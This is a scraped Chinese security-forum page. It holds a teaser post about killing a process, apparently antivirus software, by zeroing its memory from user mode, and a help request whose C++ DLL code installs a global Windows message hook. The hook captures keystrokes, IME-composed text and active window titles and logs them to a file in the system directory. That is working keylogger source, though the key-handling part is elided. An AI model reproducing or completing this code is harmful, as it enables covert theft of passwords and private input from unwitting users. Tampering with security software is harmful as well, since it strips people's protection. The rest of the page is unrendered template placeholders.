|
[原创]Ring3内存清0杀进程
360的进程貌似penProcess(PROCESS_ALL_ACCESS,0,pe32.th32ProcessID)“不了 |
|
[求助]在dll中调用钩子函数的问题
#include "stdafx.h" #include <stdio.h> #include <imm.h> #include <fstream.h> #include <string.h> #pragma comment(lib,"imm32.lib") #pragma data_seg("YCIShared") HHOOK KBhookCn=NULL; #pragma data_seg() static HWND g_hLastFocus=NULL; const int KeyPressMask=0x80000000; char Path[MAX_PATH]; HMODULE WINAPI ModuleFromAddress(PVOID pv) { MEMORY_BASIC_INFORMATION mbi; if(::VirtualQuery(pv, &mbi, sizeof(mbi)) != 0) { return (HMODULE)mbi.AllocationBase; } else { return NULL; } } LRESULT CALLBACK KBhookCn_deal(int nCode,WPARAM wParam,LPARAM lParam); void WINAPI SetKBHookCn(BOOL bInstall, DWORD dwThreadId) { if (bInstall) { OutputDebugString("hook Install "); KBhookCn=::SetWindowsHookEx(WH_GETMESSAGE,(HOOKPROC)KBhookCn_deal,ModuleFromAddress(KBhookCn_deal),dwThreadId); if (KBhookCn==NULL) { OutputDebugString("安装钩子失败 FALSE"); return; } OutputDebugString("Installed "); }else { OutputDebugString("unhook "); if(KBhookCn!=NULL) { if(::UnhookWindowsHookEx(KBhookCn)==0) OutputDebugString("卸载钩子失败 FALSE"); else{ KBhookCn=NULL; } } } } LRESULT CALLBACK KBhookCn_deal(int nCode,WPARAM wParam,LPARAM lParam) { LRESULT lResult = CallNextHookEx(KBhookCn, nCode, wParam, lParam); PMSG pmsg = (PMSG)lParam; if(nCode != HC_ACTION) return 0; OutputDebugString("HC_ACTION "); 这一句开始的时候会被执行几次,之后回调函数失效 char str[128]; memset(str,'\0',128); if(pmsg->message==WM_IME_COMPOSITION) { OutputDebugString("WM_IME_COMPOSITION ");//这里没有执行过 HWND hFocus; char szTitle[256]; hFocus=GetActiveWindow(); if(g_hLastFocus!=hFocus) { GetWindowText(hFocus,szTitle,256); g_hLastFocus=hFocus; ofstream file(Path,ios::ate); file<<"\r\n\r\n"<<szTitle<<"\r\n"; } HIMC hIMC; HWND hWnd; hWnd=pmsg->hwnd; DWORD dwSize; char lpstr[128]; if(pmsg->lParam & GCS_RESULTSTR) { hIMC = ImmGetContext(hWnd); if(!hIMC) { return 0; } dwSize = ImmGetCompositionString(hIMC, GCS_RESULTSTR, NULL, 0); dwSize += sizeof(WCHAR); memset(lpstr, 0, sizeof(lpstr)); ImmGetCompositionString(hIMC, GCS_RESULTSTR, lpstr, dwSize); strcat(str,lpstr); ofstream file(Path,ios::ate); file<<lpstr; ImmReleaseContext(hWnd, hIMC); } return 0; } if(pmsg->message==WM_KEYDOWN) { OutputDebugString("WM_KEYDOWN "); char ch; HWND hFocus; char szTitle[256]; hFocus=GetActiveWindow(); if(g_hLastFocus!=hFocus) { ofstream file(Path,ios::ate); GetWindowText(hFocus,szTitle,256); g_hLastFocus=hFocus; file<<"\r\n\r\n"<<szTitle<<"\r\n"; } ......省略处理键盘消息的代码(分析消息,保存文件,太长了)。 return 0; } } } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch(ul_reason_for_call){ case DLL_PROCESS_ATTACH: GetSystemDirectory(Path,MAX_PATH); strcat(Path,("\\fengz.txt")); break; case DLL_PROCESS_DETACH: break; default: break; } return TRUE; } |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值